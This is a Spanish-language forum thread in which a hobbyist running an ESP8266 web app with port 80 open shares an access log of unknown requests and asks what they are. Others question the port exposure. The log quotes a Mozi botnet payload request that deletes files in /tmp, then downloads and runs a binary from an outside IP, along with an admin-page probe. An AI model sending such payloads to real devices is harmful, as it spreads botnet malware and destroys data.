Hola Hoy empece a trastear con un dispisitivo del internet de las cosas y abri el puerto 80 e empezaron al rato a aparecer ips que no conocia y alguna con entrada muy rara y no se por que ni que son dejo un estracto de lo sucedido.
20:30:20.273 → Nuevo Clinete
20:30:20.544 → GET / HTTP/1.1
20:30:20.544 → 200.25.168.122
20:30:20.591 → Client disonnected
20:30:20.591 →
20:32:58.970 → Nuevo Clinete
20:33:02.791 → GET /shell?cd+/tmp;rm±rf+*;wget+http://83.179.24.5:38234/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
20:33:02.928 → 83.179.24.5
20:33:02.928 → Client disonnected
20:33:02.928 →
20:44:05.202 → Nuevo Clinete
20:44:05.450 → GET / HTTP/1.1
20:44:05.450 → 186.66.22.231
20:44:05.450 → Client disonnected
esta entrada es la que mas me preocupa: GET /shell?cd+/tmp;rm±rf+*;wget+http://83.179.24.5:38234/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
A ver si entiendo bien… ¿has abierto el puerto 80 en el cortafuegos del router para que todo lo que llegue desde fuera hacia adentro por ese puerto pase sin bloqueo?
si ,lo abri por que estoy aprendiendo unas cosilla con un esp8266 y ya hay un monton de ip que intentan conectarse pero yo no e dado a nadie mi ip.
como esta …
21:22:33.482 → Nuevo Clinete
21:22:35.498 → GET /admin/config.php HTTP/1.0
21:22:35.498 → 77.247.108.77
21:22:35.498 → Client disonnected
Tu no has dado tu ip a nadie, pero esta es visible. Abrir el puerto 80, salvo para un servidor HTTP, es una muy mala decisión. Utiliza alguno que no sea de un protocolo determinado, por ejemplo, el 23000.
es que es una aplicacion web. y la cosa no para mientra escribo van 10 interanciones distintas y no se que hacer lo que estoy haciendo es agregarlos a el fireware del router y bloqueandolos
Sí, pero yo entiendo que tú has abierto el puerto en el router para acceder a ese aparato desde fuera de la red local (esto es, desde la calle, usando la IP pública), ¿correcto?
Y, si es así, ¿qué es exactamente lo que hace ese aparato? ¿Realmente necesitas abrir el puerto 80 (de HTTP)?
Parece ser un módulo wifi para arduino. Se ve que el usuario lo ha usado para conectarlo al WiFi, pero necesito que me diga qué servicio es el que pretende dar hacia el exterior como para necesitar el puerto 80 abierto.